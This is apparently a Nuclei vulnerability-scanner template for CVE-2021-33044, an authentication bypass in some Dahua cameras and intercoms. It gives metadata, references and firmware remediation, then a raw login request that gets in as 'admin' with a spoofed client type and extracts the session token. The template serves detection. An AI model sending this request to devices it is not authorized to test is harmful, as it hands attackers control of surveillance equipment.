Description
Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
id: CVE-2021-33044
info:
name: Dahua IPC/VTH/VTO - Authentication Bypass
author: gy741
severity: critical
description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
impact: |
An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.
remediation: |
Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.
reference:
- https://github.com/dorkerdevil/CVE-2021-33044
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
- https://seclists.org/fulldisclosure/2021/Oct/13
- https://www.dahuasecurity.com/support/cybersecurity/details/957
- https://github.com/bp2008/DahuaLoginBypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-33044
cwe-id: CWE-287
epss-score: 0.99871
epss-percentile: 0.99963
cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dahuasecurity
product: ipc-hum7xxx_firmware
tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev,vkev,vuln
http:
- raw:
- |
POST /RPC2_Login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"result":true,"session"'
- 'id'
- 'params'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- ',"result":true,"session":"([a-z]+)"\}'
part: body
# digest: 4b0a00483046022100c6ee39da9c8602ab5d249afe2c94a48c60e2e743d0b39a70946396d92a60d5a3022100b6f9b2c5116f6e60df9d183a422833ff8d1b067da182fcc9ca0a7b4ae83230c7:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.